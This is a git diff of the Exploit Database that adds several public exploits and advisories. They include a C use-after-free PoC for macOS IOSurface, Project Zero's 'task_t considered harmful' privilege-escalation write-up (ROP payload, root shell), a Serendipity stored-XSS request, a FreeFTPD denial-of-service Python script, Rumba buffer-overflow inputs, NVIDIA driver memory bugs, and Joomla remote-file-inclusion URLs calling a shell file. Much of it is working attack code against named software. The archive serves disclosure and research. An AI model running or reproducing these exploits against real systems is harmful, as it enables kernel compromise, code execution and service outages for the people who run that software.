connection\n"); + return; + } + + printf("got user client\n"); + + // drop our ref on the child_task_port + mach_port_deallocate(mach_task_self(), child_task_port); + + // kill the child, free'ing its task struct + kill(child_pid, 9); + int status; + wait(&status); + + printf("killed child\n"); + + // make an external method call which will use that free'd task struct + char struct_input[0x74] = {0}; + + //+0x70 dword = index into sroutines + //+0x38 dword = size of first argument + //+0x0 qword = pointer to first argument + struct_input[0x38] = 0x80; + *(uint64_t*)(&struct_input[0]) = 0x414141414141; + + err = IOConnectCallMethod(conn, + 0, + NULL, + 0, + struct_input, + 0x74, + NULL, + NULL, + NULL, + NULL); + MACH_ERR("making external method call", err); + +} + +int main(int argc, char** argv) { + setup_shared_port(); + + pid_t child_pid = fork(); + if (child_pid == -1) { + FAIL("forking"); + } + + if (child_pid == 0) { + mach_port_t shared_port_child = recover_shared_port_child(); + do_child(shared_port_child); + } else { + mach_port_t shared_port_parent = recover_shared_port_parent(); + mach_port_t child_task_port = do_parent(shared_port_parent); + trigger(child_pid, child_task_port); + } + + return 0; +} \ No newline at end of file diff --git a/platforms/osx/local/40653.txt b/platforms/osx/local/40653.txt new file mode 100755 index 000000000..40b8e0520 --- /dev/null +++ b/platforms/osx/local/40653.txt @@ -0,0 +1,31 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=831 + +IOSurfaceRootUserClient stores a task struct pointer (passed in via IOServiceOpen) in the field at +0xf0 without taking a reference. + +By killing the corrisponding task we can free this pointer leaving the user client with a dangling pointer. We can get this pointer used +by calling the create_surface_fast_path external method which will try to read and use the memory map off of the free'd task struct. + +This bug could be leveraged for kernel memory corruption and is reachable from interesting sandboxes including safari and chrome. + +build: clang -o surfaceroot_uaf surfaceroot_uaf.c -framework IOKit + +You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics! + +tested on OS X 10.11.5 (15F34) on MacBookAir5,2 + +##################################### + +another PoC for "task_t considered harmful" +since 10.11.6 blocks us from creating userclients with other task's task ports +this time we create an IOSurface in the child and send back a send right to that +IOSurface to the parent (rather than sending the child's task port.) + +The child then execs a suid-root binary which blocks on stderr and the parent +creates an IOSurface which maps any (writable?) page of the euid-0 process into theirs. +Overwrite a function pointer and win. + +No race conditions because the task struct pointer is on the kernel heap, not the stack. + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40653.zip diff --git a/platforms/osx/local/40669.txt b/platforms/osx/local/40669.txt new file mode 100755 index 000000000..8d4d6fac8 --- /dev/null +++ b/platforms/osx/local/40669.txt @@ -0,0 +1,249 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=837 + +TL;DR +you cannot hold or use a task struct pointer and expect the euid of that task to stay the same. +Many many places in the kernel do this and there are a great many very exploitable bugs as a result. + +******** + +task_t is just a typedef for a task struct *. It's the abstraction level which represents a whole task +comprised of threads and a virtual memory map. + +task_t's have a corrisponding mach port type (IKOT_TASK) known as a task port. The task port structure +in the kernel has a pointer to the task struct which it represents. If you have send rights to a task port then +you have control over its VM and, via task_threads, its threads. + +When a suid-root binary is executed the kernel invalidates the old task and thread port structures setting their +object pointers to NULL and allocating new ports instead. + +CVE-2016-1757 was a race condition concerning the order in which those port structures were invalidated during the +exec operation. + +Although the issues I will describe in this bug report may seem similar is is a completely different, and far worse, +bug class. + +~~~~~~~~~ + +When a suid binary is executed it's true that the task's old task and thread ports get invalidated, however, the task +struct itself stays the same. There's no fork and no creation of a new task. This means that any pointers to that task struct +now point to the task struct of an euid 0 process. + +There are lots of IOKit drivers which save task struct pointers as members; see my recent bug reports for some examples. + +In those cases I reported there was another bug, namely that they weren't taking a reference on the task struct meaning +that if we killed the corrisponding task and then forked and exec'ed a suid root binary we could get the IOKit object +to interact via the task struct pointer with the VM of a euid 0 process. (You could also break out of a sandbox by +forcing launchd to spawn a new service binary which would reuse the free'd task struct.) + +However, looking more closely, even if those IOKit drivers *do* take a reference on the task struct it doesn't matter! +(at least not when there are suid binaries around.) Just because the userspace client of the user client had send rights +to a task port at time A when it passed that task port to IOKit doesn't mean that it still has send rights to it when +the IOKit driver actually uses the task struct pointer... In the case of IOSurface this lets us trivially map any RW area +of virtual memory in an euid 0 process into ours and write to it. (See the other exploit I sent for that IOSurface bug.) + +There are a large number of IOKit drivers which do this (storing task struct pointers) and then either use the to manipulate +userspace VM (eg IOAcceleratorFamily2, IOThunderboltFamily, IOSurface) or rely on that task struct pointer to perform +authorization checks like the code in IOHIDFamily. + +Another interesting case to consider are task struct pointers on the stack. + +in the MIG files for the user/kernel interface task ports are subject to the following intran: + + type task_t = mach_port_t + #if KERNEL_SERVER + intran: task_t convert_port_to_task(mach_port_t) + +where convert_port_to_task is: + + task_t + convert_port_to_task( + ipc_port_t port) + { + task_t task = TASK_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + + if ( ip_active(port) && + ip_kotype(port) == IKOT_TASK ) { + task = (task_t)port->ip_kobject; + assert(task != TASK_NULL); + + task_reference_internal(task); + } + + ip_unlock(port); + } + + return (task); + } + +This converts the task port into the corrisponding task struct pointer. It takes a reference on the task struct but that only +makes sure that it doesn't get free'd, not that its euid doesn't change as the result of the exec of an suid root binary. + +As soon as that port lock is dropped the task could exec a suid-root binary and although this task port would no longer be valid +that task struct pointer would remain valid. + +This leads to a huge number of interesting race conditions. Grep the source for all .defs files which take a task_t to find them all ;-) + +In this exploit PoC I'll target perhaps the most interesting one: task_threads. + +Let's look at how task_threads actually works, including the kernel code which is generated by MiG: + +In task_server.c (an autogenerated file, build XNU first if you can't find this file) : + + target_task = convert_port_to_task(In0P->Head.msgh_request_port); + + RetCode = task_threads(target_task, (thread_act_array_t *)&(OutP->act_list.address), &OutP->act_listCnt); + task_deallocate(target_task); + +This gives us back the task struct from the task port then calls task_threads: +(unimportant bits removed) + + task_threads( + task_t task, + thread_act_array_t *threads_out, + mach_msg_type_number_t *count) + { + ... + for (thread = (thread_t)queue_first(&task->threads); i < actual; + ++i, thread = (thread_t)queue_next(&thread->task_threads)) { + thread_reference_internal(thread); + thread_list[j++] = thread; + } + + ... + + for (i = 0; i < actual; ++i) + ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); + } + ... + } + +task_threads uses the task struct pointer to iterate through the list of threads, then creates send rights to them +which get sent back to user space. There are a few locks taken and dropped in here but they're irrelevant. + +What happens if that task is exec-ing a suid root binary at the same time? + +The relevant parts of the exec code are these two points in ipc_task_reset and ipc_thread_reset: + + void + ipc_task_reset( + task_t task) + { + ipc_port_t old_kport, new_kport; + ipc_port_t old_sself; + ipc_port_t old_exc_actions[EXC_TYPES_COUNT]; + int i; + + new_kport = ipc_port_alloc_kernel(); + if (new_kport == IP_NULL) + panic("ipc_task_reset"); + + itk_lock(task); + + old_kport = task->itk_self; + + if (old_kport == IP_NULL) { + itk_unlock(task); + ipc_port_dealloc_kernel(new_kport); + return; + } + + task->itk_self = new_kport; + old_sself = task->itk_sself; + task->itk_sself = ipc_port_make_send(new_kport); + ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); <-- point (1) + + ... then calls: + + ipc_thread_reset( + thread_t thread) + { + ipc_port_t old_kport, new_kport; + ipc_port_t old_sself; + ipc_port_t old_exc_actions[EXC_TYPES_COUNT]; + boolean_t has_old_exc_actions = FALSE; + int i; + + new_kport = ipc_port_alloc_kernel(); + if (new_kport == IP_NULL) + panic("ipc_task_reset"); + + thread_mtx_lock(thread); + + old_kport = thread->ith_self; + + if (old_kport == IP_NULL) { + thread_mtx_unlock(thread); + ipc_port_dealloc_kernel(new_kport); + return; + } + + thread->ith_self = new_kport; <-- point (2) + +Point (1) clears out the task struct pointer from the old task port and allocates a new port for the task. +Point (2) does the same for the thread port. + +Let's call the process which is doing the exec process B and the process doing task_threads() process A and imagine +the following interleaving of execution: + + Process A: target_task = convert_port_to_task(In0P->Head.msgh_request_port); // gets pointer to process B's task struct + + Process B: ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); // process B invalidates the old task port so that it no longer has a task struct pointer + + Process B: thread->ith_self = new_kport // process B allocates new thread ports and sets them up + + Process A: ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); // process A reads and converts the *new* thread port objects! + +Note that the fundamental issue here isn't this particular race condition but the fact that a task struct pointer can just +never ever be relied on to have the same euid as when you first got hold of it. + +~~~~~~~~~~~~~~~ + +Exploit: + +This PoC exploits exactly this race condition to get a thread port for an euid 0 process. Since we've execd it I just stick a +ret-slide followed by a small ROP payload on the actual stack at exec time then use the thread port to set RIP to a gadget +which does a large add rsp, X and pop's a shell :) + +just run it for a while, it's quite a tight race window but it will work! (try a few in parallel) + +tested on OS X 10.11.5 (15F34) on MacBookAir5,2 + +###################################### + +A faster exploit which also defeats the mitigations shipped in MacOS 10.12. Should work for all kernel versions <= 10.12 + +###################################### + +Fixed: https://support.apple.com/en-us/HT207275 + +Disclosure timeline: + +2016-06-02 - Ian Beer reports "task_t considered harmful issue" to Apple +2016-06-30 - Apple requests 60 day disclosure extension. +2016-07-12 - Project Zero declines disclosure extension request. +2016-07-19 - Meeting with Apple to discuss disclosure timeline. +2016-07-21 - Followup meeting with Apple to discuss disclosure timeline. +2016-08-10 - Meeting with Apple to discuss proposed fix and disclosure timeline. +2016-08-15 - Project Zero confirms publication date will be September 21, Apple acknowledges. +2016-08-29 - Meeting with Apple to discuss technical details of (1) "short-term mitigation" that will be shipped within disclosure deadline, and (2) "long-term fix" that will be shipped after the disclosure deadline. +2016-09-13 - Apple release the "short-term mitigation" for iOS 10 +2016-09-13 - Apple requests a restriction on disclosed technical details to only those parts of the issue covered by the short-term mitigation. +2016-09-14 - Project Zero confirms that it will disclose full details without restriction. +2016-09-16 - Apple repeats request to withhold details from the disclosure, Project Zero confirms it will disclose full details. +2016-09-17 - Apple requests that Project Zero delay disclosure until a security update in October. +2016-09-18 - Apple's senior leadership contacts Google's senior leadership to request that Project Zero delay disclosure of the task_t issue +2016-09-19 - Google grants a 5 week flexible disclosure extension. +2016-09-20 - Apple release a "short-term mitigation" for the task_t issue for MacOS 10.12 +2016-09-21 - Planned publication date passes. +2016-10-03 - Apple publicly release long-term fix for the task_t issue in MacOS beta release version 10.12.1 beta 3. +2016-10-24 - Apple release MacOS version 10.12.1 +2016-10-25 - Disclosure date of "task_t considered harmful" + +Project Zero remains committed to a 90-day disclosure window, and will continue to apply disclosure deadlines on all of our vulnerability research findings. A 14 day grace extension is available for cases where a patch is expected shortly after the 90-day time window. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40669.zip diff --git a/platforms/php/webapps/28403.txt b/platforms/php/webapps/28403.txt index 55a0b79f1..4fb1aa38f 100755 --- a/platforms/php/webapps/28403.txt +++ b/platforms/php/webapps/28403.txt @@ -8,4 +8,5 @@ Versions 1.2 and prior are vulnerable to these issues; other versions may also b This BID has been retired because this issue is not exploitable. -http://www.example.com/mtg_homepage.php?mosConfig_absolute_path=http://www.example.com http://www.example.com/install.mtg_homepage.php?mosConfig_absolute_path=http://www.example.com \ No newline at end of file +http://www.example.com/mtg_homepage.php?mosConfig_absolute_path=http://www.example.com +http://www.example.com/install.mtg_homepage.php?mosConfig_absolute_path=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/28404.txt b/platforms/php/webapps/28404.txt index 3b19971ce..56e04aa67 100755 --- a/platforms/php/webapps/28404.txt +++ b/platforms/php/webapps/28404.txt @@ -8,4 +8,6 @@ Versions 1.0 and prior are vulnerable to these issues; other versions may also b This BID has been retired. -http://www.example.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt? http://www.example.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt? http://www.example.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt? \ No newline at end of file +http://www.example.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt? +http://www.example.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt? +http://www.example.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/40650.txt b/platforms/php/webapps/40650.txt new file mode 100755 index 000000000..f4855170f --- /dev/null +++ b/platforms/php/webapps/40650.txt @@ -0,0 +1,72 @@ +======================================== +Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting +Application: Serendipity +Class: Sensitive Information disclosure +Versions Affected: <= latest version +Vendor URL: http://docs.s9y.org/ +Software URL: http://docs.s9y.org/downloads.html +Bugs: Persistent Cross Site Scripting +Date of found: 29.10.2016 +Author: Besim +======================================== + +2.CREDIT +======================================== +Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK + + +3. VERSIONS AFFECTED +======================================== + <= latest version + + +4. TECHNICAL DETAILS & POC +======================================== + + Stored Cross Site Scripting (No Admin Required) +======================================== + +1) Editor login panel +2) User click 'New Entry' +3) Attacker(normal user) enter xss payload to 'Entry Body' input +4) Vulnerability Parameter and Payload : &body= + +### HTTP Request ### + +POST /serendipity/serendipity_admin.php? HTTP/1.1 +Host: site_name +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new +Cookie: --- +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 762 + +- POST DATA + +serendipity[action]=admin +&serendipity[adminModule]=entries +&serendipity[adminAction]=save +&serendipity[id]= +&serendipity[timestamp]=1477314176 +&serendipity[preview]=false +&serendipity[token]=324fa32a404e03de978d9a18f86a3338 +&serendipity[title]=New Page +&serendipity[body]= +&serendipity[extended]= +&serendipity[chk_timestamp]=1477314176 +&serendipity[new_timestamp]=2016-10-24 15:02 +&serendipity[isdraft]=false +&serendipity[allow_comments]=true +&serendipity[had_categories]=1 +&serendipity[propertyform]=true +&serendipity[properties][access]=public +&ignore_password= +&serendipity[properties][entrypassword]= +&serendipity[change_author]=4 + + diff --git a/platforms/windows/dos/40647.py b/platforms/windows/dos/40647.py new file mode 100755 index 000000000..807246e67 --- /dev/null +++ b/platforms/windows/dos/40647.py @@ -0,0 +1,99 @@ +from ftplib import FTP + +print ''' + + + `,;'++';,` + `'++++++++++++++++;` + .+++++++++++++++++++++++'` + ;++++++:` `:++++++: + '++++'` , +`. :; .`` .'++++; + :++++, '+ `+.+.+`+':+:+ +:` + :++++, + ++++, `+ +`+.+`+':+.+ +:'.+. :++++ + ,+++; +` +:':+`+',+`+,++.+:+ +, '+++. + '+++` `++ ;+ ,+:'; ,: ;;+`++ +.+`+. `+++; + +++; `: ++' + '+++ :++;++,+: + '+++ + +++, ++' ,+ .;+++++',` : + ',+ :+++ + +++` ++ +:+ +: .+++++++++++++++; : ++'+,,`,+++ + +++` `+;.+'` '++++++++++++++++++++. ;+;+:.+` .+++ + '++` ++ +,.` '++++++++++++++++++++++++. +;.+`+ ,++; + :++, +:++`' ,+++++++++++++''++++++++++++ `+.+: :++. + ++; . +:+: +++++++++'. `;++++++++. .+' ++ +++ + +++ ;++ +: ++++++++, .+++++++; ;:+;+ +++ + :++ ;+,++ `+++++++, `++++++' +,+,.+ `++. + ++: `+`+'. ++++++' ;+++++' +`;++ '++ + '++ ,+,' ++++++, .+++++; ++ ++: + ++. ' + ++++++` +++++. ` '+.:++ + ;++ +; + ;+++++` +++++ :++ ; ++: + ++, '++ `+++++, `+++++ +` `. :++ + ,++ ` ;+: +++++' :++++` ,+ ++` + ++; .+++` .+++++ +++++ '++:: ++' + ++` ;+':: +++++. ++++` '`+++`.++ + .++ `++ +++++ '++++ +: ++` + '++ `++; '++++` ++++ ++; + ++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++: + ++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ++ +;,` ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++: +;++ `.,. +++++ ++++ '..': ,++'` ,+++` `++++ ++++ +;+` ++++: ++++++' ++++++' ++++ ++++ :.'`; ++++: ++` :+, ++` ,+: ++++ +'++ `+++. ++++; : + : + ,++++ +;++ :` ++++' `+++++ +,++ `+;;+ +++++ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; :;;;;;;;;;;;;;;++++++. +`++ ++,+ +++++ :+++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++' + ++ ` `, ;++++ ++++++++++++++++++++++++++++++++++++: ++++++++++++++++++++ + ++` .+++.`++++: ++++++++++++++++++++++++++++++++++++ `++++++++++++++++++, + ++: ','+: +++++ :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++ ++++:,:,,:,,+++,. + ;++ +:`, '++++` +++++. +++++` ++++ '.+' ++, + ++ +++ +++++ :+++++ ++++++ ;++++ ++.+ ++ + ++, ';`+' +++++` ++++++ ++++++ ++++` + +. :++ + '++ :++;, .+++++ ++++++` ++++++, +++++ ++: + `++ +` :+, +++++: .++++++' :++++++; .++++. +` `++ + ++' ;++` `+++++` ,+++++++'` :+++++++; +++++ :++` +++ + ,++ ,: + '+++++ .++++++++++';:;++++++++++: +++++ ;+' ++` + +++ :+' ++++++ ++++++++++++++++++++++` +++++. ;+` , +++ + ,++ :++`;+` ++++++` :++++++++++++++++++' +++++' `+,+;`;`++. + +++ : ++.+ `++++++: :++++++++++++++; ,+++++' ++`+ +++ + `++, +;+` `+++++++` `:++++++++:` ++++++' ++ ,+; ;++` + '++ :+ `' ++++++++` `+++++++; +++ ;`++; + +++ `:`+ +++++++++: ,++++++++, +,++ +++ + +++ +++;' :+++++++++++';::;'+++++++++++ ;+ +,' +++ + ,+++ +++.+.: +++++++++++++++++++++++++. '' ++ + +++` + ;++' ` +`+`;. `+++++++++++++++++++++, :,+,:+: +++, + ;+++ ,++:'++` ,+++++++++++++++; ++ .++ ` +++: + ;+++ + +`+ +; .;'++++':` ++.+':++ +++: + :+++` `++, :;+`+; ::+ +,+`+. .+++, + .+++' `, +`:'+ +,+` +, +:+.++:';+ ++ ++++` + ++++. +':++: +;+` ': +:+ +.+ +' :++++ + :++++. . +,+,;+'` '; :'+`+'+ ,++++, + +++++: ` +`+'` '; `++` ;++++' + `++++++: ;' + :++++++` + `+++++++':. `,:+++++++' + .++++++++++++++++++++++. + `:'++++++++++++', + + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScrR1pTK1dd13.slammer@gmail.com # + ############################################## + + +# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit +# Date: 2016.10.30 +# Exploit Author: Greg Priest +# Version: FreeFTPD_1.0.8 +# Tested on: Windows XP, Windows 7 x64 + +''' + +ftp_ip = raw_input("FTP server IP:") +killerstring = 'A' * 500 +ftp = FTP('127.0.0.1') +ftp.login('anonymous', 'h4ck3r@h4ck3r.net') +print ftp.login +print "SERVER KILLED" +FTP.mkd(ftp, killerstring) diff --git a/platforms/windows/dos/40648.txt b/platforms/windows/dos/40648.txt new file mode 100755 index 000000000..323e80cd8 --- /dev/null +++ b/platforms/windows/dos/40648.txt @@ -0,0 +1,58 @@ +# Exploit Title: Micro Focus Rumba 9.4 Multiple Local Stack-overflow +# Date: 29-10-2016 +# Exploit Author: Umit Aksu +# Vendor Homepage: http://www.microfocus.com/ +# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231 +# Version: 9.4 +# Tested on: Internet Explorer 11 on windows 7 +# CVE : + + +1. Description + +Multiple local stack overflow vulnerabilities which can used when to exploit when learning exploit development. + +Note: Rumba uses send.exe and receive.exe to send and receive files so it might be possible to exploit this remotely. + + +2. Proof of Concept + +The code below sprayes the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. + + +C:\Program Files (x86)\Micro Focus\RUMBA\System>send c:\aaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +RUMBA Command-line File Transfer Utility + +SEH + NSEH overwritten + + +C:\Program Files (x86)\Micro Focus\RUMBA\System>receive.exe c:\aaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd +ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +RUMBA Command-line File Transfer Utility \ No newline at end of file diff --git a/platforms/windows/dos/40649.html b/platforms/windows/dos/40649.html new file mode 100755 index 000000000..aa68ae044 --- /dev/null +++ b/platforms/windows/dos/40649.html @@ -0,0 +1,102 @@ +# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow +# Date: 29-10-2016 +# Exploit Author: Umit Aksu +# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx +# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231 +# Version: <= 9.3 +# Tested on: Internet Explorer 11 on windows 7 +# CVE : CVE-2016-5228 + + + +1. Description +Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument. + + +2. Proof of Concept + +The code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. + + + + + + + + + + +
+ + + + + + + + + + + + diff --git a/platforms/windows/dos/40656.txt b/platforms/windows/dos/40656.txt new file mode 100755 index 000000000..51404a6be --- /dev/null +++ b/platforms/windows/dos/40656.txt @@ -0,0 +1,59 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=892 + +The handler for the DxgkDdiEscape escape code 0x70000D4 has the following pseudocode: + +void __fastcall escape_70000D4(NvMiniportDeviceContext *a1, NvEscapeData *a2) +{ + Escape70000D4 *escape_data_; // rbx@1 + PVOID alloc_buf; // rsi@1 + unsigned int v4; // edi@1 + __int64 user_ptr; // r14@4 + DWORD *v6; // rbx@5 + __int128 v7; // [rsp+40h] [rbp-38h]@1 + __int128 v8; // [rsp+50h] [rbp-28h]@4 + PVOID alloc_buf_; // [rsp+60h] [rbp-18h]@4 + + escape_data_ = (Escape70000D4 *)a2; + a2->unknown_rest[6] = 1; + LODWORD(v7) = 0; + memset((char *)&v7 + 4, 0, 0x24ui64); + alloc_buf = ExAllocatePoolWithTag_(PagedPool, escape_data_->user_ptr_size, 'paVN'); + v4 = 0; + if ( !alloc_buf ) + v4 = 0xFFFF; + if ( v4 ) + goto LABEL_12; + HIDWORD(v8) = escape_data_->user_ptr_size; + alloc_buf_ = alloc_buf; + v4 = sub_625BC(0i64, dword_B1BB94, escape_data_->unknown_0, 0x83F30101, (__int64)&v7, 40); + user_ptr = escape_data_->user_ptr; + ProbeForWrite((PVOID)escape_data_->user_ptr, escape_data_->user_ptr_size, UserMode); + memcpy((void *)escape_data_->user_ptr, alloc_buf, escape_data_->user_ptr_size); + *(_OWORD *)&escape_data_->unknown_2 = v7; + *(_OWORD *)&escape_data_->unknown_4 = v8; + escape_data_->user_ptr = user_ptr; + if ( v4 ) + { +LABEL_12: + v6 = &escape_data_->header.unknown_rest[6]; + if ( v6 ) + { + if ( v4 <= 0xFFFFF000 ) + *v6 = -4096 - v4; + } + } + if ( alloc_buf ) + ExFreePoolWithTag_(alloc_buf, 0x7061564Eu); +} + +ExAllocatePoolWithTag is called with a user provided size to allocate a buffer, but the subsequent copying of said buffer to the user provided pointer doesn't make sense since the buffer is never initialised with any values. This means that a user mode program can leak uninitialised memory from arbitrarily-sized pool allocations. + +######## + +Looks like I made an oversimplified analysis of the pseudocode in the report. The allocated buffer pointer is indeed passed off to the sub_625BC function (as part of a struct member on the stack) which eventually passes it to a bunch of other functions. + +However, this doesn't change the fact that with the provided PoC, the pool allocated buffer still isn't being initialised and is copied into the user buffer unchanged. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40656.zip diff --git a/platforms/windows/dos/40657.txt b/platforms/windows/dos/40657.txt new file mode 100755 index 000000000..c217c4b43 --- /dev/null +++ b/platforms/windows/dos/40657.txt @@ -0,0 +1,47 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=894 + +The DxgkDdiEscape handler for 0x700010d accepts a user provided pointer as the +destination for a memcpy call, without doing any checks on said pointer. + +void __fastcall escape_700010D(NvMiniportDeviceContext* ctx, NvEscapeData *escape) +{ + ... + v8 = escape->unknown_2; + if ( v8 == 1 ) + { + data.size = escape->size; + data.buf = ExAllocatePoolWithTag((POOL_TYPE)512, 0xC08i64 * data.size, 0x7061564Eu); + v9 = Escape7Handler(0i64, dword_7DCB84, dword_7DCB84, 626, &data, 0x190); + } + + ... + else if ( escape->unknown_2 == 1 ) + { + memcpy(escape->user_ptr, data.buf, 3080i64 * escape->size); + + +(Win 10 x64 372.54) crashing context with PoC (in memcpy) on a write to 0x4141414141414141: + +SYSTEM_SERVICE_EXCEPTION (3b) +... +CONTEXT: ffffd0002d2ab5c0 -- (.cxr 0xffffd0002d2ab5c0) +rax=0000000000000001 rbx=ffffc0016c9b9b40 rcx=000000000000000f +rdx=bebe9ebf4b4e0ecf rsi=0000000000000001 rdi=000000007061564e +rip=fffff8005488ab00 rsp=ffffd0002d2abfe8 rbp=ffffd0002d2ac0f0 + r8=0000000000000bf9 r9=ffffd00024014ac0 r10=0000000000000000 +r11=4141414141414141 r12=0000000000000340 r13=fffff800542b0000 +r14=ffffe0008fb2d000 